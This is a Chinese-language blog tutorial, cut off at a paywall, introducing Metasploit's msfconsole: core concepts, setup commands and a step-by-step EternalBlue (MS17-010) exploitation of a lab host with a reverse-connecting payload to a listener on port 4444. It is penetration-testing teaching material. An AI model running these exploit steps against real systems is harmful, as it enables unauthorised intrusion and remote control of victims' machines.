本文是一篇详尽的Metasploit(msfconsole)和Meterpreter渗透测试教程,介绍了msfconsole的基本概念、常用命令、攻击实战、模块开发及与Cobalt Strike的联动使用。通过实例展示了如何利用msfconsole进行渗透攻击,包括exploit、payload、shellcode和module的使用,以及如何处理payload架构错误的问题。
文章目录
详尽的msf——meterpreter——渗透测试教程
前言
本文仅供学习参考使用,切勿用于非法事情!!
众所周知,msf是大家公认的神器,年少不知msf香,总想自己写程序。
现在发现msf很厉害,可以在它的基础上开发。
msf是框架,什么意思呢,用它可以做渗透攻击的一整套流程,包括前期探索(发育),中期攻击(开团),后期控守(推塔)
我们可以在msfconsole上,开发自己的程序(用自己的英雄),程序可以利用msf中的模块(用它的装备)
msfconsole简介
Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。
五大模块:
渗透攻击(Exploit),指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。
攻击载荷(Payload),是我们期望目标系统在被渗透攻击之后去执行的代码。
Shellcode,是在渗透攻击是作为攻击载荷运行的一组机器指令,通常用汇编语言编写。
模块(Module),指Metasploit框架中所使用的一段软件代码组件,可用于发起渗透攻击或执行某些辅助攻击动作。
监听器(Listener),是Metasploit中用来等待网络连接的组件。
msfconsole使用方法——常用命令
直接使用并进行一次攻击
#初次使用:
service postgresql start # 启动数据库服务
msfdb init # 初始化数据库
#之后使用:
msfconsole # 启动metasploit
#查看帮助选项
help
#search - 查看漏洞:
search ms08_067
#use - 使用漏洞:
use exploit/windows/smb/ms08_067_netapi
#show - 查看可以攻击的靶机操作系统型号(targets):
show targets
#set - 设置target 参数(xx是对应被攻击靶机的型号):
set target xx
#set - 设置rhost参数(攻击靶机的ip地址):
set rhost 192.168.xxx.xxx
#show - 查看参数:
show options
#进行攻击:
exploit
具体参数可以查看帮助选项
help
msfconsole攻击实战
由于msfconsole是内网渗透神器,所以在外网上效果差强人意,需要考虑端口转发等等事情。
例如:
在内网,反弹shell可以直接链接到本机IP,
在外网,如果端口转发,回连的IP为外网IP,回连的端口为外网端口
成功上传payload并执行后,可以得到目标的meterpreter(伪shell)
以一次永恒之蓝漏洞过程为例
渗透过程:
先用msfconsole的smb模块扫描,看看是否有漏洞
use auxiliary/scanner/smb/smb_ms17_010
存在漏洞
使用模块
use exploit/windows/smb/ms17_010_eternalblue
show options
设置目标:
set rhost 192.168.148.137
#设置payload等
set lhost 192.168.148.134
set lport 4444
run
结果:
查看信息:
ok
按照网上的教程, 该payload都是64位的,如果目标机是32位的,会出现架构不对的情况,需要下载新的模块并加载
如何加载新的模块、开发新的模块请看目录:载入外部模块:关于ms17_010实战后续
最低0.47元/天 解锁文章
扫一扫
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
